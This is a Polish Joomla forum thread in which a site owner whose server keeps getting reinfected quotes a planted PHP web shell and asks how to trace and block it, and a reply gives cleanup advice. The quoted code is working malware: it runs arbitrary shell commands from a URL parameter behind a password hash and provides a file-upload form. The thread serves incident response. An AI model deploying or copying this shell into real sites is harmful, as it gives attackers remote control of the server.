Nowe pliki i wstrzykiwany kod do już istniejących
Wyniki 1 do 2 z 2

Temat: Nowe pliki i wstrzykiwany kod do już istniejących

  1. #1

    Joomla! 3.4 Nowe pliki i wstrzykiwany kod do już istniejących

    Cześć,
    mam spory problem. Od pewnego czasu (mam wrażenie że od pewnej aktualizacji J!) praktycznie co kilka dni IP mojego serwera wpadał do antyspamowej blokady CBL. Stronę czyściłem. Problem się powtarzał. Poprosiłem o przeskanowanie strony @trzepiz'a - znalazł zainfekowane pliki i wszystko wyczyścił (Michał, bardzo dziękuję za pomoc ). Teraz niby jest ok, ale cały czas Admin Tools wyłapuje próby logowania i innych ataków. Wrzucam IP do black listy, niestety codziennie mam nowe ataki. Coś się uparło na IP serwera. Ostatnio jednak AT wyłapało nowy plik o takiej treści:

    Kod PHP:
    <?php if(md5($_GET["ms-load"])=="211482534c08b94ad061174d49f8e237"){
    $c=$_GET['cmd'];
    system($c);
    $p=$_SERVER["DOCUMENT_ROOT"];
    $yoco=dirname(__FILE__);
    echo <<<HTML
    <form enctype="multipart/form-data"  method="POST">
    Path:
    $p<br>
    <input name="file" type="file"><br>
    To:<br>
    <input size="48" value="
    $yoco/" name="pt" type="text"><br>
    <input type="submit" value="Upload">
    $tend
    HTML;
    if (isset(
    $_POST["pt"])){
    $uploadfile $_POST["pt"].$_FILES["file"]["name"];
    if (
    $_POST["pt"]==""){$uploadfile $_FILES["file"]["name"];}
    if (
    copy($_FILES["file"]["tmp_name"], $uploadfile)){
    echo
    "uploaded:$uploadfilen";
    echo
    "Size:".$_FILES["file"]["size"]."n";
    }else {
    print 
    "Error:n";
    }
    }
    }
    Zastanawiam się czy dałoby się namierzyć gdzie idzie wysyłka tego formularza. Jeśli nie to czy mogę tak zabezpieczyć plik, aby nie mógł być edytowany/nadpisywany? Zmieniłem jego treść i przyzwolenia. Dziś jednak widzę że plik został nadpisany ponownie z powyższą zawartością.

    Nie wiem co dalej...

    Pozdrówka, Vereb
    Joomla! User Group Silesia - strona pasjonatów systemu Joomla! ze Śląska
    Pomogłem? Świetnie dodaj mi punkt do reputacji dzięki

  2. #2
    Nowicjusz
    Dołączył
    31-01-2012
    Wpisy
    19
    Punkty
    11

    Domyślny

    Skanowanie plików nie zawsze wskaże pliki zainfekowane. Pliki zakodowane a wykonujące jakąś akcję będą często ignorowane przez skanery. Próby logowania i ataków są codziennością.
    Jeśli używasz admin toolsa to przeprowadz skanowanie zmian w plikach. Na liście podejrzanych można "gołym okiem" zauważyć plik nietypowo nazwany np. menu343.php, 3434.php, jquery.php. Na Twoim serwerze jest na pewno jakiś plik zakodowany. Odnalezienie go nie będzie łatwe. Można pobrac wszystko na lokalny dysk i skanowac, przeglądać pliki, porównywać zawartość katalogów do tych z przed wgrania pliku. Logi systemowe oczywiście sprawdzone, chociaż czasem nic tam nie widać.
    Zmień wszystkie możliwe hasła, zaktualizuj wersje php na serwerze.

    - - - Updated - - -

    Skanowanie plików nie zawsze wskaże pliki zainfekowane. Pliki zakodowane a wykonujące jakąś akcję będą często ignorowane przez skanery. Próby logowania i ataków są codziennością.
    Jeśli używasz admin toolsa to przeprowadz skanowanie zmian w plikach. Na liście podejrzanych można "gołym okiem" zauważyć plik nietypowo nazwany np. menu343.php, 3434.php, jquery.php. Na Twoim serwerze jest na pewno jakiś plik zakodowany. Odnalezienie go nie będzie łatwe. Można pobrac wszystko na lokalny dysk i skanowac, przeglądać pliki, porównywać zawartość katalogów do tych z przed wgrania pliku. Logi systemowe oczywiście sprawdzone, chociaż czasem nic tam nie widać.
    Zmień wszystkie możliwe hasła, zaktualizuj wersje php na serwerze.

Podobne tematy

  1. Samoistnie wgrywające się pliki, infekowanie istniejących
    przez damianoo na forum Bezpieczeństwo
    Odpowiedzi: 2
    Ostatni post/autor: 27-10-2015, 10:31
  2. Jak do jDownloads dodać istniejące już na serwerze pliki ?
    przez wonski333 na forum Zasoby, plikownie,
    Odpowiedzi: 2
    Ostatni post/autor: 06-09-2012, 13:54
  3. 60% mniejszy kod! 200% szybszy! Nowe wcielenie! Już jutro do pobrania
    przez zwiastun na forum Ogłoszenia i komunikaty
    Odpowiedzi: 1
    Ostatni post/autor: 01-04-2011, 21:16
  4. Przenoszenie/edytowacnie stron już istniejących
    przez Arth na forum Instalacje (Joomla!, składników)
    Odpowiedzi: 10
    Ostatni post/autor: 27-01-2008, 20:38

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •